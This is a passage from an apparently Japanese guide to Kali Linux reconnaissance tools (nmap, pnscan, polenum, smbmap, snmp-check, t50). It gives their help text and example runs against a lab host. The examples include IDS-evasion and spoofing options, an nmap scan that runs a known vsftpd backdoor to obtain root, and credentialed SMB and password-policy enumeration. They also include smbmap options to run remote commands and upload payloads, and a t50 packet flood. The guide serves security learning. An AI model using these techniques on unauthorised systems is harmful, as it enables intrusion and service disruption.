-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags <flags>: Customize TCP scan flags
-sI <zombie host[:probeport]>: Idle scan
-sY/sZ: SCTP INIT/COOKIE-ECHO scans
-sO: IP protocol scan
-b <FTP relay host>: FTP bounce scan
PORT SPECIFICATION AND SCAN ORDER:
-p <port ranges>: Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
--exclude-ports <port ranges>: Exclude the specified ports from scanning
-F: Fast mode - Scan fewer ports than the default scan
-r: Scan ports sequentially - don\'t randomize
--top-ports <number>: Scan <number> most common ports
--port-ratio <ratio>: Scan ports more common than <ratio>
SERVICE/VERSION DETECTION:
-sV: Probe open ports to determine service/version info
--version-intensity <level>: Set from 0 (light) to 9 (try all probes)
--version-light: Limit to most likely probes (intensity 2)
--version-all: Try every single probe (intensity 9)
--version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
-sC: equivalent to --script=default
--script=<Lua scripts>: <Lua scripts> is a comma separated list of
directories, script-files or script-categories
--script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts
--script-args-file=filename: provide NSE script args in a file
--script-trace: Show all data sent and received
--script-updatedb: Update the script database.
--script-help=<Lua scripts>: Show help about scripts.
<Lua scripts> is a comma-separated list of script-files or
script-categories.
OS DETECTION:
-O: Enable OS detection
--osscan-limit: Limit OS detection to promising targets
--osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
Options which take <time> are in seconds, or append 'ms' (milliseconds),
's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
-T<0-5>: Set timing template (higher is faster)
--min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes
--min-parallelism/max-parallelism <numprobes>: Probe parallelization
--min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies
probe round trip time.
--max-retries <tries>: Caps number of port scan probe retransmissions.
--host-timeout <time>: Give up on target after this long
--scan-delay/--max-scan-delay <time>: Adjust delay between probes
--min-rate <number>: Send packets no slower than <number> per second
--max-rate <number>: Send packets no faster than <number> per second
FIREWALL/IDS EVASION AND SPOOFING:
-f; --mtu <val>: fragment packets (optionally w/given MTU)
-D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys
-S <IP_Address>: Spoof source address
-e <iface>: Use specified interface
-g/--source-port <portnum>: Use given port number
--proxies <url1,[url2],...>: Relay connections through HTTP/SOCKS4 proxies
--data <hex string>: Append a custom payload to sent packets
--data-string <string>: Append a custom ASCII string to sent packets
--data-length <num>: Append random data to sent packets
--ip-options <options>: Send packets with specified ip options
--ttl <val>: Set IP time-to-live field
--spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address
--badsum: Send packets with a bogus TCP/UDP/SCTP checksum
OUTPUT:
-oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3,
and Grepable format, respectively, to the given filename.
-oA <basename>: Output in the three major formats at once
-v: Increase verbosity level (use -vv or more for greater effect)
-d: Increase debugging level (use -dd or more for greater effect)
--reason: Display the reason a port is in a particular state
--open: Only show open (or possibly open) ports
--packet-trace: Show all packets sent and received
--iflist: Print host interfaces and routes (for debugging)
--append-output: Append to rather than clobber specified output files
--resume <filename>: Resume an aborted scan
--noninteractive: Disable runtime interactions via keyboard
--stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML
--webxml: Reference stylesheet from Nmap.Org for more portable XML
--no-stylesheet: Prevent associating of XSL stylesheet w/XML output
MISC:
-6: Enable IPv6 scanning
-A: Enable OS detection, version detection, script scanning, and traceroute
--datadir <dirname>: Specify custom Nmap data file location
--send-eth/--send-ip: Send using raw ethernet frames or IP packets
--privileged: Assume that the user is fully privileged
--unprivileged: Assume the user lacks raw socket privileges
-V: Print version number
-h: Print this help summary page.
■ 使用例
# ポートスキャン+OSやソフトウェアのバージョンの検出を有効化
root@kali:~# nmap -A -T4 192.168.11.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-30 09:28 UTC
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.11.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
|_ssl-date: 2024-10-30T09:31:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
[...]
# ACKスキャンでファイアウォールによるフィルタリングをチェック
root@kali:~# nmap -sA --top-ports 10 192.168.11.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-31 00:03 UTC
PORT STATE SERVICE
21/tcp unfiltered ftp
22/tcp unfiltered ssh
23/tcp filtered telnet
25/tcp unfiltered smtp
80/tcp unfiltered http
110/tcp unfiltered pop3
139/tcp unfiltered netbios-ssn
443/tcp unfiltered https
445/tcp unfiltered microsoft-ds
3389/tcp unfiltered ms-wbt-server
# ポートスキャン+ソフトウェアの脆弱性の検出を有効化
root@kali:~# nmap --script=vuln 192.168.11.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-30 09:18 UTC
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: BID:48539 CVE:CVE-2011-2523
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| Shell command: id
| Results: uid=0(root) gid=0(root)
| References:
| https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
| http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
| https://www.securityfocus.com/bid/48539
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
22/tcp open ssh syn-ack ttl 64
23/tcp open telnet syn-ack ttl 64
25/tcp open smtp syn-ack ttl 64
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params:
| VULNERABLE:
| Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
| State: VULNERABLE
| Transport Layer Security (TLS) services that use anonymous
| Diffie-Hellman key exchange only provide protection against passive
| eavesdropping, and are vulnerable to active man-in-the-middle attacks
| which could completely compromise the confidentiality and integrity
| of any data exchanged over the resulting session.
| Check results:
[...]
NmapSI4
NmapをGUIから操作・結果の確認を行うことが出来ます。
■ 使用例
Pnscan
大規模ネットワークのポートスキャンをマルチスレッドで高速に行います。
■ 使用方法
root@kali:~# pnscan -h
Usage: pnscan [<options>] [{<CIDR>|<host-range> <port-range>} | <service>]
Command line options:
-h Display this information.
-V Print version.
-v Be verbose.
-d Print debugging info.
-s Lookup and print hostnames.
-i Ignore case when scanning responses.
-S Enable shutdown mode.
-l Line oriented output.
-w<string> Request string to send.
-W<hex list> Hex coded request string to send.
-r<string> Response string to look for.
-R<hex list> Hex coded response string to look for.
-L<length> Max bytes to print.
-t<msecs> Connect/Write/Read timeout.
-n<workers> Concurrent worker threads limit.
■ 使用例
root@kali:~# pnscan 192.168.11.0/24 20:25
192.168.11.4 : 21 : TXT : 220 (vsFTPd 2.3.4)\r\n
192.168.11.4 : 23 : TEL : <IAC><DO>\x18<IAC><DO> <IAC><DO>#<IAC><DO>
192.168.11.4 : 22 : TXT : SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\n
192.168.11.5 : 22 : TXT : SSH-2.0-OpenSSH_9.9p1 Debian-3\r\n
192.168.11.4 : 25 : TXT : 220 kali.localdomain ESMTP Postfix (Ubuntu)\r\n
polenum
ドメインコントローラーのパスワードポリシーを抽出します。
■ 使用方法
root@kali:~# polenum --help
usage: polenum [-h] [--username USERNAME] [--password PASSWORD] [--domain DOMAIN] [--protocols [PROTOCOLS ...]] [enum4linux]
positional arguments:
enum4linux username:password@IPaddress
options:
-h, --help show this help message and exit
--username USERNAME, -u USERNAME
The specified username
--password PASSWORD, -p PASSWORD
The password of the user
--domain DOMAIN, -d DOMAIN
The domain or IP
--protocols [PROTOCOLS ...]
['139/SMB', '445/SMB']
■ 使用例
root@kali:~# polenum hello:HelloWorld123@192.168.11.4
[+] Attaching to 192.168.11.4 using hello:HelloWorld123
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] EXAMPLE
[+] BUILTIN
[+] Password Info for Domain: EXAMPLE
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000001
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 1
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
SMBMap
ネットワーク共有フォルダ(SMB)を探索します。
■ 使用方法
root@kali:~# smbmap --help
usage: smbmap [-h] (-H HOST | --host-file FILE) [-u USERNAME] [-p PASSWORD | --prompt] [-k] [--no-pass] [--dc-ip IP or Host]
[-s SHARE] [-d DOMAIN] [-P PORT] [-v] [--signing] [--admin] [--no-banner] [--no-color] [--no-update]
[--timeout SCAN_TIMEOUT] [-x COMMAND] [--mode CMDMODE] [-L | -r [PATH]] [-g FILE | --csv FILE] [--dir-only]
[--no-write-check] [-q] [--depth DEPTH] [--exclude SHARE [SHARE ...]] [-A PATTERN] [-F PATTERN]
[--search-path PATH] [--search-timeout TIMEOUT] [--download PATH] [--upload SRC DST] [--delete PATH TO FILE]
[--skip]
options:
-h, --help show this help message and exit
Main arguments:
-H HOST IP or FQDN
--host-file FILE File containing a list of hosts
-u USERNAME, --username USERNAME
Username, if omitted null session assumed
-p PASSWORD, --password PASSWORD
Password or NTLM hash, format is LMHASH:NTHASH
--prompt Prompt for a password
-s SHARE Specify a share (default C$), ex 'C$'
-d DOMAIN Domain name (default WORKGROUP)
-P PORT SMB port (default 445)
-v, --version Return the OS version of the remote host
--signing Check if host has SMB signing disabled, enabled, or required
--admin Just report if the user is an admin
--no-banner Removes the banner from the top of the output
--no-color Removes the color from output
--no-update Removes the "Working on it" message
--timeout SCAN_TIMEOUT
Set port scan socket timeout. Default is .5 seconds
Kerberos settings:
-k, --kerberos Use Kerberos authentication
--no-pass Use CCache file (export KRB5CCNAME='~/current.ccache')
--dc-ip IP or Host IP or FQDN of DC
Command Execution:
Options for executing commands on the specified host
-x COMMAND Execute a command ex. 'ipconfig /all'
--mode CMDMODE Set the execution method, wmi or psexec, default wmi
Shard drive Search:
Options for searching/enumerating the share of the specified host(s)
-L List all drives on the specified host, requires ADMIN rights.
-r [PATH] Recursively list dirs and files (no share\path lists the root of ALL shares), ex. 'email/backup'
-g FILE Output to a file in a grep friendly format, used with -r (otherwise it outputs nothing), ex -g
grep_out.txt
--csv FILE Output to a CSV file, ex --csv shares.csv
--dir-only List only directories, ommit files.
--no-write-check Skip check to see if drive grants WRITE access.
-q Quiet verbose output. Only shows shares you have READ or WRITE on, and suppresses file listing when
performing a search (-A).
--depth DEPTH Traverse a directory tree to a specific depth. Default is 1 (root node).
--exclude SHARE [SHARE ...]
Exclude share(s) from searching and listing, ex. --exclude ADMIN$ C\$\'
-A PATTERN Define a file name pattern (regex) that auto downloads a file on a match (requires -r), not case
sensitive, ex '(web|global).(asax|config)'
File Content Search:
Options for searching the content of files (must run as root), kind of experimental
-F PATTERN File content search, -F '[Pp]assword' (requires admin access to execute commands, and PowerShell on
victim host)
--search-path PATH Specify drive/path to search (used with -F, default C:\Users), ex 'D:\HR\'
--search-timeout TIMEOUT
Specifcy a timeout (in seconds) before the file search job gets killed. Default is 300 seconds.
Filesystem interaction:
Options for interacting with the specified host\'s filesystem
--download PATH Download a file from the remote system, ex.'C$\temp\passwords.txt'
--upload SRC DST Upload a file to the remote system ex. '/tmp/payload.exe C$\temp\payload.exe'
--delete PATH TO FILE
Delete a remote file, ex. 'C$\temp\msf.exe'
--skip Skip delete file confirmation prompt
■ 使用例
root@kali:~# smbmap -u hello -p hello -H 192.168.11.4
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.11.4:445 Name: server4test.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ READ ONLY Printer Drivers
tmp READ, WRITE oh noes!
opt READ ONLY
IPC$ NO ACCESS IPC Service (61154d1295a0 server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (61154d1295a0 server (Samba 3.0.20-Debian))
hello READ, WRITE Home Directories
[*] Closed 1 connections
Snmpcheck
SNMPエージェントから値を読み取り、読みやすい形式で出力します。
■ 使用方法
root@kali:~# snmp-check --help
snmp-check v1.9 - SNMP enumerator
Usage: snmp-check [OPTIONS] <target IP address>
-p --port : SNMP port. Default port is 161;
-c --community : SNMP community. Default is public;
-v --version : SNMP version (1,2c). Default is 1;
-w --write : detect write access (separate action by enumeration);
-d --disable_tcp : disable TCP connections enumeration!
-t --timeout : timeout in seconds. Default is 5;
-r --retries : request retries. Default is 1;
-i --info : show script version;
-h --help : show help menu;
■ 使用例
root@kali:~# snmp-check 192.168.11.4
[+] Try to connect to 192.168.11.4:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 192.168.11.4
Hostname : 61154d1295a0
Description : Linux server4test 5.15.153.1 #1 SMP Fri Mar 29 23:14:13 UTC 2024 x86_64
Contact : msfdev@metasploit.com
Location : Metasploit Lab
Uptime snmp : 13:57:03.87
Uptime system : 00:00:58.58
System date : 2024-11-14 06:42:04.0
[...]
[*] TCP connections and listening ports:
Local address Local port Remote address Remote port State
0.0.0.0 21 0.0.0.0 0 listen
0.0.0.0 23 0.0.0.0 0 listen
0.0.0.0 25 0.0.0.0 0 listen
0.0.0.0 80 0.0.0.0 0 listen
0.0.0.0 111 0.0.0.0 0 listen
0.0.0.0 139 0.0.0.0 0 listen
0.0.0.0 445 0.0.0.0 0 listen
0.0.0.0 512 0.0.0.0 0 listen
0.0.0.0 513 0.0.0.0 0 listen
0.0.0.0 514 0.0.0.0 0 listen
0.0.0.0 1099 0.0.0.0 0 listen
[...]
[*] Storage information:
Description : ["Physical memory"]
Device id : [#<SNMP::Integer:0x00007f312a0025c8 @value=1>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x00007f312a000980 @value=1024>]
Memory size : 7.71 GB
Memory used : 1.66 GB
[...]
T50
任意のデータパケットを作成して負荷テストなどを行うためのツールです。標準プロトコル (ICMP、TCP、UDP)、インフラストラクチャ固有のプロトコル (GRE、IPSec、RSVP)、ルーティングプロトコル (RIP、EIGRP、OSPF)など複数のプロトコルに対応しています。
■ 使用方法
root@kali:~# t50 --help
Usage: t50 <host[/cidr]> [options]
Common Options:
--threshold NUM Threshold of packets to send (default 1000)
--flood This option supersedes the 'threshold'
--encapsulated Encapsulated protocol (GRE) (default OFF)
-B,--bogus-csum Bogus checksum (default OFF)
--shuffle Shuffling for T50 protocol (default OFF)
-q,--quiet Disable INFOs
--turbo Extend the performance (default OFF)
-l,--list-protocols List all available protocols
-v,--version Print version and exit
-h,--help Display this help and exit
GRE Options:
--gre-seq-present GRE sequence # present (default OFF)
--gre-key-present GRE key present (default OFF)
--gre-sum-present GRE checksum present (default OFF)
--gre-key NUM GRE key (default RANDOM)
--gre-sequence NUM GRE sequence # (default RANDOM)
--gre-saddr ADDR GRE IP source IP address (default RANDOM)
--gre-daddr ADDR GRE IP destination IP address (default RANDOM)
DCCP/TCP/UDP Options:
--sport NUM DCCP|TCP|UDP source port (default RANDOM)
--dport NUM DCCP|TCP|UDP destination port (default RANDOM)
TCP Options:
--ack-seq NUM TCP ACK sequence # (default RANDOM)
--sequence NUM TCP SYN sequence # (default RANDOM)
--data-offset NUM TCP data offset (default 5)
-F,--fin TCP FIN flag (default OFF)
-S,--syn TCP SYN flag (default OFF)
-R,--rst TCP RST flag (default OFF)
-P,--psh TCP PSH flag (default OFF)
-A,--ack TCP ACK flag (default OFF)
-U,--urg TCP URG flag (default OFF)
-E,--ece TCP ECE flag (default OFF)
-C,--cwr TCP CWR flag (default OFF)
-W,--window NUM TCP Window size (default NONE)
--urg-pointer NUM TCP URG pointer (default NONE)
--mss NUM TCP Maximum Segment Size (default NONE)
--wscale NUM TCP Window Scale (default NONE)
--tstamp NUM:NUM TCP Timestamp (TSval:TSecr) (default NONE)
--sack-ok TCP SACK-Permitted (default OFF)
--ttcp-cc NUM T/TCP Connection Count (CC) (default NONE)
--ccnew NUM T/TCP Connection Count (CC.NEW) (default NONE)
--ccecho NUM T/TCP Connection Count (CC.ECHO) (default NONE)
--sack NUM:NUM TCP SACK Edges (Left:Right) (default NONE)
--md5-signature TCP MD5 signature included (default OFF)
--authentication TCP-AO authentication included (default OFF)
--auth-key-id NUM TCP-AO authentication key ID (default 1)
--auth-next-key NUM TCP-AO authentication next key (default 1)
--nop TCP No-Operation (default EOL)
IP Options:
-s,--saddr ADDR IP source IP address (default RANDOM)
--tos NUM IP type of service (default 0x40)
--id NUM IP identification (default RANDOM)
--frag-offset NUM IP fragmentation offset (default 0)
--ttl NUM IP time to live (default 255)
--protocol PROTO IP protocol (default TCP)
ICMP Options:
--icmp-type NUM ICMP type (default 8)
--icmp-code NUM ICMP code (default 0)
--icmp-gateway ADDR ICMP redirect gateway (default RANDOM)
--icmp-id NUM ICMP identification (default RANDOM)
--icmp-sequence NUM ICMP sequence # (default RANDOM)
EGP Options:
--egp-type NUM EGP type (default 3)
--egp-code NUM EGP code (default 3)
--egp-status NUM EGP status (default 1)
--egp-as NUM EGP autonomous system (default RANDOM)
--egp-sequence NUM EGP sequence # (default RANDOM)
--egp-hello NUM EGP hello interval (default RANDOM)
--egp-poll NUM EGP poll interval (default RANDOM)
RIP Options:
--rip-command NUM RIPv1/v2 command (default 2)
--rip-family NUM RIPv1/v2 address family (default 2)
--rip-address ADDR RIPv1/v2 router address (default RANDOM)
--rip-metric NUM RIPv1/v2 router metric (default RANDOM)
--rip-domain NUM RIPv2 router domain (default RANDOM)
--rip-tag NUM RIPv2 router tag (default RANDOM)
--rip-netmask ADDR RIPv2 router subnet mask (default RANDOM)
--rip-next-hop ADDR RIPv2 router next hop (default RANDOM)
--rip-authentication RIPv2 authentication included (default OFF)
--rip-auth-key-id NUM RIPv2 authentication key ID (default 1)
--rip-auth-sequence NUM RIPv2 authentication sequence # (default RANDOM)
DCCP Options:
--dccp-data-offset NUM DCCP data offset (default VARY)
--dccp-cscov NUM DCCP checksum coverage (default 0)
--dccp-ccval NUM DCCP HC-Sender CCID (default RANDOM)
--dccp-type NUM DCCP type (default 0)
--dccp-extended DCCP extend for sequence # (default OFF)
--dccp-sequence-1 NUM DCCP sequence # (default RANDOM)
--dccp-sequence-2 NUM DCCP extended sequence # (default RANDOM)
--dccp-sequence-3 NUM DCCP sequence # low (default RANDOM)
--dccp-service NUM DCCP service code (default RANDOM)
--dccp-acknowledge-1 NUM DCCP acknowledgment # high (default RANDOM)
--dccp-acknowledge-2 NUM DCCP acknowledgment # low (default RANDOM)
--dccp-reset-code NUM DCCP reset code (default RANDOM)
RSVP Options:
--rsvp-flags NUM RSVP flags (default 1)
--rsvp-type NUM RSVP message type (default 1)
--rsvp-ttl NUM RSVP time to live (default 254)
--rsvp-session-addr ADDR RSVP SESSION destination address (default RANDOM)
--rsvp-session-proto NUM RSVP SESSION protocol ID (default 1)
--rsvp-session-flags NUM RSVP SESSION flags (default 1)
--rsvp-session-port NUM RSVP SESSION destination port (default RANDOM)
--rsvp-hop-addr ADDR RSVP HOP neighbor address (default RANDOM)
--rsvp-hop-iface NUM RSVP HOP logical interface (default RANDOM)
--rsvp-time-refresh NUM RSVP TIME refresh interval (default 360)
--rsvp-error-addr ADDR RSVP ERROR node address (default RANDOM)
--rsvp-error-flags NUM RSVP ERROR flags (default 2)
--rsvp-error-code NUM RSVP ERROR code (default 2)
--rsvp-error-value NUM RSVP ERROR value (default 8)
--rsvp-scope NUM RSVP SCOPE # of address(es) (default 1)
--rsvp-address ADDR,... RSVP SCOPE address(es) (default RANDOM)
--rsvp-style-option NUM RSVP STYLE option vector (default 18)
--rsvp-sender-addr ADDR RSVP SENDER TEMPLATE address (default RANDOM)
--rsvp-sender-port NUM RSVP SENDER TEMPLATE port (default RANDOM)
--rsvp-tspec-traffic RSVP TSPEC service traffic (default OFF)
--rsvp-tspec-guaranteed RSVP TSPEC service guaranteed (default OFF)
--rsvp-tspec-r NUM RSVP TSPEC token bucket rate (default RANDOM)
--rsvp-tspec-b NUM RSVP TSPEC token bucket size (default RANDOM)
--rsvp-tspec-p NUM RSVP TSPEC peak data rate (default RANDOM)
--rsvp-tspec-m NUM RSVP TSPEC minimum policed unit (default RANDOM)
--rsvp-tspec-M NUM RSVP TSPEC maximum packet size (default RANDOM)
--rsvp-adspec-ishop NUM RSVP ADSPEC IS HOP count (default RANDOM)
--rsvp-adspec-path NUM RSVP ADSPEC path b/w estimate (default RANDOM)
--rsvp-adspec-m NUM RSVP ADSPEC minimum path latency (default RANDOM)
--rsvp-adspec-mtu NUM RSVP ADSPEC composed MTU (default RANDOM)
--rsvp-adspec-guaranteed RSVP ADSPEC service guaranteed (default OFF)
--rsvp-adspec-Ctot NUM RSVP ADSPEC ETE composed value C (default RANDOM)
--rsvp-adspec-Dtot NUM RSVP ADSPEC ETE composed value D (default RANDOM)
--rsvp-adspec-Csum NUM RSVP ADSPEC SLR point composed C (default RANDOM)
--rsvp-adspec-Dsum NUM RSVP ADSPEC SLR point composed D (default RANDOM)
--rsvp-adspec-controlled RSVP ADSPEC service controlled (default OFF)
--rsvp-confirm-addr ADDR RSVP CONFIRM receiver address (default RANDOM)
IPSEC Options:
--ipsec-ah-length NUM IPSec AH header length (default NONE)
--ipsec-ah-spi NUM IPSec AH SPI (default RANDOM)
--ipsec-ah-sequence NUM IPSec AH sequence # (default RANDOM)
--ipsec-esp-spi NUM IPSec ESP SPI (default RANDOM)
--ipsec-esp-sequence NUM IPSec ESP sequence # (default RANDOM)
EIGRP Options:
--eigrp-opcode NUM EIGRP opcode (default 1)
--eigrp-flags NUM EIGRP flags (default RANDOM)
--eigrp-sequence NUM EIGRP sequence # (default RANDOM)
--eigrp-acknowledge NUM EIGRP acknowledgment # (default RANDOM)
--eigrp-as NUM EIGRP autonomous system (default RANDOM)
--eigrp-type NUM EIGRP type (default 258)
--eigrp-length NUM EIGRP length (default NONE)
--eigrp-k1 NUM EIGRP parameter K1 value (default 1)
--eigrp-k2 NUM EIGRP parameter K2 value (default 0)
--eigrp-k3 NUM EIGRP parameter K3 value (default 1)
--eigrp-k4 NUM EIGRP parameter K4 value (default 0)
--eigrp-k5 NUM EIGRP parameter K5 value (default 0)
--eigrp-hold NUM EIGRP parameter hold time (default 360)
--eigrp-ios-ver NUM.NUM EIGRP IOS release version (default 12.4)
--eigrp-rel-ver NUM.NUM EIGRP PROTO release version (default 1.2)
--eigrp-next-hop ADDR EIGRP [in|ex]ternal next-hop (default RANDOM)
--eigrp-delay NUM EIGRP [in|ex]ternal delay (default RANDOM)
--eigrp-bandwidth NUM EIGRP [in|ex]ternal bandwidth (default RANDOM)
--eigrp-mtu NUM EIGRP [in|ex]ternal MTU (default 1500)
--eigrp-hop-count NUM EIGRP [in|ex]ternal hop count (default RANDOM)
--eigrp-load NUM EIGRP [in|ex]ternal load (default RANDOM)
--eigrp-reliability NUM EIGRP [in|ex]ternal reliability (default RANDOM)
--eigrp-daddr ADDR/CIDR EIGRP [in|ex]ternal address(es) (default RANDOM)
--eigrp-src-router ADDR EIGRP external source router (default RANDOM)
--eigrp-src-as NUM EIGRP external autonomous system (default RANDOM)
--eigrp-tag NUM EIGRP external arbitrary tag (default RANDOM)
--eigrp-proto-metric NUM EIGRP external protocol metric (default RANDOM)
--eigrp-proto-id NUM EIGRP external protocol ID (default 2)
--eigrp-ext-flags NUM EIGRP external flags (default RANDOM)
--eigrp-address ADDR EIGRP multicast sequence address (default RANDOM)
--eigrp-multicast NUM EIGRP multicast sequence # (default RANDOM)
--eigrp-authentication EIGRP authentication included (default OFF)
--eigrp-auth-key-id NUM EIGRP authentication key ID (default 1)
OSPF Options:
--ospf-type NUM OSPF type (default 1)
--ospf-length NUM OSPF length (default NONE)
--ospf-router-id ADDR OSPF router ID (default RANDOM)
--ospf-area-id ADDR OSPF area ID (default 0.0.0.0)
-1,--ospf-option-MT OSPF multi-topology / TOS-based (default RANDOM)
-2,--ospf-option-E OSPF external routing capability (default RANDOM)
-3,--ospf-option-MC OSPF multicast capable (default RANDOM)
-4,--ospf-option-NP OSPF NSSA supported (default RANDOM)
-5,--ospf-option-L OSPF LLS data block contained (default RANDOM)
-6,--ospf-option-DC OSPF demand circuits supported (default RANDOM)
-7,--ospf-option-O OSPF Opaque-LSA (default RANDOM)
-8,--ospf-option-DN OSPF DOWN bit (default RANDOM)
--ospf-netmask ADDR OSPF router subnet mask (default RANDOM)
--ospf-hello-interval NUM OSPF HELLO interval (default RANDOM)
--ospf-hello-priority NUM OSPF HELLO router priority (default 1)
--ospf-hello-dead NUM OSPF HELLO router dead interval (default 360)
--ospf-hello-design ADDR OSPF HELLO designated router (default RANDOM)
--ospf-hello-backup ADDR OSPF HELLO backup designated (default RANDOM)
--ospf-neighbor NUM OSPF HELLO # of neighbor(s) (default NONE)
--ospf-address ADDR,... OSPF HELLO neighbor address(es) (default RANDOM)
--ospf-dd-mtu NUM OSPF DD MTU (default 1500)
--ospf-dd-dbdesc-MS OSPF DD master/slave bit option (default RANDOM)
--ospf-dd-dbdesc-M OSPF DD more bit option (default RANDOM)
--ospf-dd-dbdesc-I OSPF DD init bit option (default RANDOM)
--ospf-dd-dbdesc-R OSPF DD out-of-band resync (default RANDOM)
--ospf-dd-sequence NUM OSPF DD sequence # (default RANDOM)
--ospf-dd-include-lsa OSPF DD include LSA header (default OFF)
--ospf-lsa-age NUM OSPF LSA age (default 360)
--ospf-lsa-do-not-age OSPF LSA do not age (default OFF)
--ospf-lsa-type NUM OSPF LSA type (default 1)
--ospf-lsa-id ADDR OSPF LSA ID address (default RANDOM)
--ospf-lsa-router ADDR OSPF LSA advertising router (default RANDOM)
--ospf-lsa-sequence NUM OSPF LSA sequence # (default RANDOM)
--ospf-lsa-metric NUM OSPF LSA metric (default RANDOM)
--ospf-lsa-flag-B OSPF Router-LSA border router (default RANDOM)
--ospf-lsa-flag-E OSPF Router-LSA external router (default RANDOM)
--ospf-lsa-flag-V OSPF Router-LSA virtual router (default RANDOM)
--ospf-lsa-flag-W OSPF Router-LSA wild router (default RANDOM)
--ospf-lsa-flag-NT OSPF Router-LSA NSSA translation (default RANDOM)
--ospf-lsa-link-id ADDR OSPF Router-LSA link ID (default RANDOM)
--ospf-lsa-link-data ADDR OSPF Router-LSA link data (default RANDOM)
--ospf-lsa-link-type NUM OSPF Router-LSA link type (default 1)
--ospf-lsa-attached ADDR OSPF Network-LSA attached router (default RANDOM)
--ospf-lsa-larger OSPF ASBR/NSSA-LSA ext. larger (default OFF)
--ospf-lsa-forward ADDR OSPF ASBR/NSSA-LSA forward (default RANDOM)
--ospf-lsa-external ADDR OSPF ASBR/NSSA-LSA external (default RANDOM)
--ospf-vertex-router OSPF Group-LSA type router (default RANDOM)
--ospf-vertex-network OSPF Group-LSA type network (default RANDOM)
--ospf-vertex-id ADDR OSPF Group-LSA vertex ID (default RANDOM)
--ospf-lls-extended-LR OSPF LLS Extended option LR (default OFF)
--ospf-lls-extended-RS OSPF LLS Extended option RS (default OFF)
--ospf-authentication OSPF authentication included (default OFF)
--ospf-auth-key-id NUM OSPF authentication key ID (default 1)
--ospf-auth-sequence NUM OSPF authentication sequence # (default RANDOM)
■ 使用例
# 対応する15個のプロトコル全てのデータパケットを生成して送信
root@kali:~# t50 192.168.11.4 --protocol T50
[INFO] Sending 1000 packets...
[INFO] Performing stress testing...
[INFO] Hit Ctrl+C to stop...
[INFO] PID=5479
[INFO] t50 5.8.7b successfully launched at Thu Nov 21 09:04:42 2024
[INFO] t50 5.8.7b successfully finished at Thu Nov 21 09:04:42 2024
[INFO] (PID:5479) packets: 1000 (54783 bytes sent).
